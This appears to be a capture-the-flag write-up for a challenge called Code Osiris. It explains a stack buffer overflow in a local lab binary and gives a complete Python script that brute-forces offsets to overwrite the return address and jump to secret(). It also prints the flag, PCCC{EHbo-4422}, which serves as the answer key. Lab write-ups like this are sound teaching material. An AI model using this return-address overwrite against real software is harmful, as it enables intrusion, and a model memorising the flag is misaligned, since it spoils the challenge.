master
Raw Download raw file

Code Osiris – TOKEN1

Target: local code_osiris_v1

Background

The binary reads stdin into a fixed-size buffer with NX off and no canary. Overwriting the saved return address with the secret function (at 0x401210) prints the token.

From Nothing to Working

  1. Download artifacts from the HQ page, get code_osiris_v1 and helper scripts.
  2. Run the provided brute-force exploit to cycle common offsets and jump to secret(). Offsets come from common 64-bit stack layouts: 32–136 bytes for small locals, 152–200 to cover saved RBP+RIP, and 256+ for compilers that reserve bigger frames.
  3. When the correct offset is hit, execution flows into secret() and the token is printed.

Command

Run the script below as python3 token1_exploit.py from the directory containing code_osiris_v1.

#!/usr/bin/env python3
# token1_exploit.py
import subprocess, struct, sys

BINARY = "./code_osiris_v1"
SECRET_ADDR = 0x401210

def p64(x): return struct.pack("<Q", x)

offsets = [40, 72, 136, 264, 520, 32, 48, 56, 64, 80, 88, 96, 104, 112, 120, 128, 144, 152, 200, 256, 260, 268]
for off in offsets:
    payload = b"A"*off + p64(SECRET_ADDR)
    try:
        r = subprocess.run([BINARY], input=payload, capture_output=True, timeout=2)
        out = r.stdout + r.stderr
        if b'PCCC' in out:
            sys.stdout.buffer.write(out)
            sys.exit(0)
    except Exception:
        pass

print("No token with tested offsets.")
sys.exit(1)

Expected Output

Look for the token line:

PCCC{EHbo-4422}